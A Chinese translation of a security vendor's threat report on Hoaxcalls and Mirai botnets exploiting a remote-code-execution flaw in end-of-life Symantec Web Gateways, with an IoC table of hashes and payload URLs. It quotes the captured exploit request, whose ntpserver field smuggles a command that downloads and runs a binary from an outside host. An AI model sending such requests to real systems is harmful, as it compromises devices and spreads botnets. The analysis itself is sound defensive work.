原文:Mirai and Hoaxcalls Botnets Target Legacy Symantec Web Gateways
譯者:知道創宇404實驗室翻譯組

摘要

作為Unit 42主動監控野外傳播威脅工作的一部分,我最近發現了新的Hoaxcalls和Mirai僵尸網絡活動,是針對賽門鐵克安全Web網關5.0.2.8中的身份驗證后的遠程執行代碼漏洞。該產品已逐漸淘汰,于2015年到期,產品支持于2019年到期。目前還沒證據表明其他版本的固件易受攻擊,我已與賽門鐵克共享這些發現。他們證實賽門鐵克Web網關5.2.8中已不再存在當前被利用的漏洞,他們還想強調一點,此漏洞不會影響安全的Web網關解決方案,包括代理程序和Web安全服務。

2020年4月24日,第一個利用該漏洞的攻擊實例浮出水面,這是同月早些時候首次發現的僵尸網絡演化的一部分。這個最新版本的Hoaxcalls支持其它命令,這些命令允許攻擊者對受感染的設備進行更大的控制,比如代理通信、下載更新、保持跨設備重啟的持久性或防止重啟,以及可以發起更多的DDoS攻擊。在漏洞細節公布的幾天后,就開始在野外使用該漏洞利用程序,這說明了一個事實,這個僵尸網絡的作者一直在積極測試新漏洞的有效性。

此后,在5月的第一周,我還發現了一個Mirai變體活動,其中涉及使用相同的漏洞利用,盡管在該活動中,樣本本身不包含任何DDoS功能。相反,它們的目的是使用證書暴力進行傳播以及利用賽門鐵克Web網關RCE漏洞。本文講述有關這兩個活動值得注意的技術細節。

Hoaxcalls進化

Hoaxcalls僵尸網絡是Bashlite/Gafgyt惡意軟件家族的一個分支,首次發現是在2020年4月,它利用了最近披露的某些Grandstream商務電話IP PBX系統模型和Draytek Vigor路由器中的漏洞。

幾周后,發現該僵尸網絡利用了一個未修補的漏洞,該漏洞影響了Zyxel Cloud CNM SecuManager。

4月24日,我觀察到同一僵尸網絡的樣本,該僵尸網絡包含針對EOL的賽門鐵克安全Web網關5.0.2.8版本的利用,并帶有以下格式的HTTP請求:

POST /spywall/timeConfig.php HTTP/1.1

User-Agent: XTC

posttime=1585228657&saveForm=Save&timesync=1&ntpserver=http://qweqwe.com;$(wget%20http://plexle.us/Th5xrRAm%20-O%20/tmp/viktor%20&&%20chmod%20777%20/tmp/viktor%20&&%20/tmp/viktor);#&timezone=5

如上面代碼所示,一些樣本訪問了一個公共文件上傳服務(plexle[.]us)的URL,其中托管了開發后的payload。

這篇文章的末尾可以找到完整的IOCs和攻擊活動時間表。

雖然Hoaxcalls僵尸網絡的新版本非常類似于最初的版本,以至于它甚至使用相同的加密方案相同的密鑰,它還支持其他命令,使攻擊者可以更有效地控制受感染的設備,例如通過它們代理流量、下載更新、在設備重啟時保持持久性或者防止重啟,以及可以發起的更多DDoS攻擊。下面詳細說明。

表1 新的Flooder命令

與更新聯系的URL提供了一個Shell腳本,該腳本從攻擊者控制的URL下載并執行二進制文件。

圖1 Hoaxcalls更新URL

其他bot和Flooder命令與之前版本的Hoaxcalls僵尸網絡有共同之處,在前面已經詳細描述過。

Mirai 變種

該活動的樣本于5月初浮出水面,構建于Mirai源代碼之上,并通過UPX算法使用不同的4字節密鑰打包了UPX的修改版本。

Mirai源代碼的另一個不同之處是使用了全部10個8字節密鑰,這些密鑰累積起來用于按字節方式的字符串加密方案。

     0xDEADBEEF, 0x85DAB8BF, 0xDEEDEEBF, 0xDEABBEAF, 0xDBBD45BF, 0x246584EF, 0x85BFE8BF, 0xD68395BF, 0xDBAAAAAF, 0x0DAABEEF

這類似于Hoaxcalls僵尸網絡所使用的方案,在以前的變種中也見過。然而,從先前的實現中也可以很明顯地看出,使用多個密鑰并不意味著更大的加密復雜性,在本例中,這實際上相當于使用0x5a的按字節XOR加密。

在本次活動中,樣本本身不包含任何DDoS功能,而是使用憑據暴力破解并且利用賽門鐵克安全Web網關RCE漏洞進行傳播。

關于成功開發的猜測

值得一提的是,僵尸網絡的成功利用和感染受到以下兩個條件的限制:

  1. 被利用的賽門鐵克安全Web網關RCE漏洞是一個身份驗證后的漏洞,意味著該漏洞僅對經過認證的會話有效。
  2. 目標設備是2012年的EOLD產品,安裝了新固件的設備不會受到攻擊。

結論

在這兩種攻擊中,可以假定它們成功利用此漏洞是受到賽門鐵克安全Web網關RCE漏洞的身份驗證特性的限制。

Palo Alto Networks的客戶受到WildFire的保護,可檢測所有帶有惡意判斷的相關樣本,并阻止該變種使用的所有攻擊。

Palo Alto Networks在本報告中與我們的網絡威脅聯盟其他成員共享了我們的發現,包括文件樣本和IoCs。 CTA成員使用此情報可快速向其客戶部署保護,并系統地破壞惡意網絡攻擊者。

IoCs

First Seen SHA256 URL
2020-05-07 1cec4576595048a179bf8c21b58f33ef61ae1825b2b3f0a86915a741a04f253f 45[.]95.168.250/swrgiuhguhwrguiwetu/arm
2020-05-07 a31187ed8545789ff2979037e19e1ca18d35a75820a1ec91053782f30c47ecc5 45[.]95.168.250/swrgiuhguhwrguiwetu/arm5
2020-05-07 ef5d39a3fa641b4d55d870437a9ba774eefcfa2c69066dd0a6fbe513a4b7a8f2 45[.]95.168.250/swrgiuhguhwrguiwetu/arm6
2020-05-07 04e8356bdc8782cf03acc9f69ff6fa9dfde7378dcd1fe0dc737d13fd4d7e061e 45[.]95.168.250/swrgiuhguhwrguiwetu/arm7
2020-05-07 60f755288c9d3110d2fe5d872b2c045156dcea4be9a5cc918bddf1e786881842 45[.]95.168.250/swrgiuhguhwrguiwetu/m68k
2020-05-07 0e531e105aa3419cd19e95fa9d44f6176157002a09444a1e5465657d743180ac 45[.]95.168.250/swrgiuhguhwrguiwetu/mips
2020-05-07 02dc186a39607475838bb4859f89e7a200f74fed41400ab5db4eb42d3f58f772 45[.]95.168.250/swrgiuhguhwrguiwetu/mpsl
2020-05-07 72675ccf2d4e0d0aac2f5121a6a80ea1efc4f30b22e64b07bd891438de2bf82a 45[.]95.168.250/swrgiuhguhwrguiwetu/ppc
2020-05-07 0a48cc158a07e13bd76ac941c4523692530f836d69256b02a10052248263d781 45[.]95.168.250/swrgiuhguhwrguiwetu/sh4
2020-05-07 37dfde696632295e806924de3d3ab751404e2a968e063a12ce72eb2e3ce0b984 45[.]95.168.250/swrgiuhguhwrguiwetu/x86
2020-05-02 da84fd43cb8701c4e23dd0a4175ebccebda026ca2f47b7b1bad393205075389f 164[.]132.92.180/arm4
2020-05-02 287645a5a29a39ef94aa0cdebdbd3cb4ad2a45ead8894fc323a5a2a76a7fdb0d 164[.]132.92.180/arm5
2020-05-02 4a4316178e85e0d4c94d74af9f2258c045194cf7a4f4a83a90abf5db09fbaa04 164[.]132.92.180/i586
2020-05-02 38290965b2cd8048b3ef076487b99dfbeef457f6f6f9998b95ff922e160a5113 164[.]132.92.180/i486
2020-05-02 25d1c51135dca20f4f7a720f237d9186edde2a2a664ede6bef37e843e7be409c 164[.]132.92.180/i686
2020-05-02 012d49c6e847f2f75983b46a9a1310dac29b5f8d30b665ae2124d8619b80753b 164[.]132.92.180/m68k
2020-05-02 763dfa5f391d27e65be6682c2e58c888df309fa2732781db312f5c9b10e6d5a1 164[.]132.92.180/mips
2020-05-02 ad1156e6ad91b02f225d82d96000cf9abf671a305e8c5c61229d69dbed5050ba 164[.]132.92.180/mips64
2020-05-02 28f31eb4b1fd3b7e742f5043a26b383585317d16bbfdae0296e18b90dcbec29b 164[.]132.92.180/ppc440
2020-05-02 5d8756118b7e017eb4f4c5da4236191b20a5c8cb96abb76c26f0e918a76bd973 164[.]132.92.180/mpsl
2020-05-02 1f64287ae9ea968017b3615f2b5b51932d7eeb3f0ee6621f74ae29af8f1a27d5 164[.]132.92.180/sh4
2020-05-02 65a8ea32f77c2d18325d49d0cc32a4bbf893a2f106e77e8a8670191c71b456a9 164[.]132.92.180/spc
2020-05-02 2b0854d40d8ffdca886f4540156b7addc4245de5df197e39ce198b9cf098944a 164[.]132.92.180/arm6
2020-05-02 43ce5e4fb95b57fa2921d718e989107a594d5287b5bbbcb3e9bff262a982e815 164[.]132.92.180/ppc
2020-05-02 3d6be7b9bd4798000230e354a5777601ca6672c8d84af842469ddeb1681ed7f2 164[.]132.92.180/arm7
2020-05-02 e0141934100df75d6b0c61858fc4cc44f97ce2a2588aa5d042f965f9542b843b 164[.]132.92.180/x86
2020-05-01 85f397e052950f736b32f0463dce7a1458ed034bec57284ea83d2ee4788f8a82 164[.]132.92.180/x86
2020-05-01 b39763036951bb373e1389362c4de6c4cbd3af3757dbb66d53fceb69de02677f 164[.]132.92.180/arm7
2020-05-01 6d76fd0bb5ba2d1c19f64288bb4b20eb136171aa8ea1afb685d2e363911aab2f 164[.]132.92.180/arm6
2020-05-01 5415ce3e759bcc3a8a163a84b64a7185f6540d4ec0ff07627ac770fd0ef0244d 164[.]132.92.180/arm5
2020-05-01 b52f8ff49e172a3e41ec60010c4089e3534ad1f0582a7ee04c4aa58c34db21ca 164[.]132.92.180/arm4
2020-05-01 e248445c39cac693fc2a921e41879fb80286f418c352d7a9d428d6181fe113a3 164[.]132.92.180/mpsl
2020-05-01 a3e2d3536d3facd3d825949addd7e99152b5df395b26e41e04b16be0a8cf4d85 164[.]132.92.180/mips
2020-04-27 82e5e0f6c130a3f0424cf33468f5ec7a3a66d14f5d346196d1b604ecd2b1e6a3 164[.]132.92.180/x86
2020-04-27 fa1bc69c9eccaaa4b8131856f9e69837f10dfa1236a65e0a8954d297c2a465bd 164[.]132.92.180/arm4
2020-04-26 233d4f6ee9f0ffb52b88de0218a0a4b04e3b20c5440e6414255d644ef696d190
2020-04-24 81e9a4b8f8a7d06d871488d9c869bde54a83ff7fe33d652ed58c10109b9830ee plexle[.]us/Th5xrRAm
2020-04-24 e15eeeaeb0ac0639bf3491ba8801e30516e085047f2d787397966065bdf9d5e7
2020-04-24 5916171938fba2d218de38c8b1f484345bc62d436b7b501ef986ae06c133b13d
2020-04-24 970496ac754ce7573216950a9904bdfc75574b4c0605e1d62364be799b9c813b
2020-04-24 735beaa92e7d697a521c7ed5292b3e8100c29a2af88f1a1b99abf0a1bc5ab5c8 164[.]132.92.180/i686
2020-04-24 84e017a59f9f7d7d5fde40bc2867a1e9d6ec6fae63b3e21685b3bb7166357531 164[.]132.92.180/arm7
2020-04-24 81e9a4b8f8a7d06d871488d9c869bde54a83ff7fe33d652ed58c10109b9830ee
2020-04-24 9ce642628cec8de80d2186d5d7f020635180326ed9e33cabde46d6c9b2caba1b
2020-04-24 20c3f1bbf4ae4733c6e01eb4f82a251bcb5b0ae0bd5f1b1a028b7ff65ea779af
2020-04-24 ddab987e986f76fcc36af92a6ea15439dd36253d91c0c3cddd77b2b9fd9ff395
2020-04-24 7bca6fcc70d14253803780e80ee57b29814adeae1af993374f919a1017f5b0f5

Paper 本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/1211/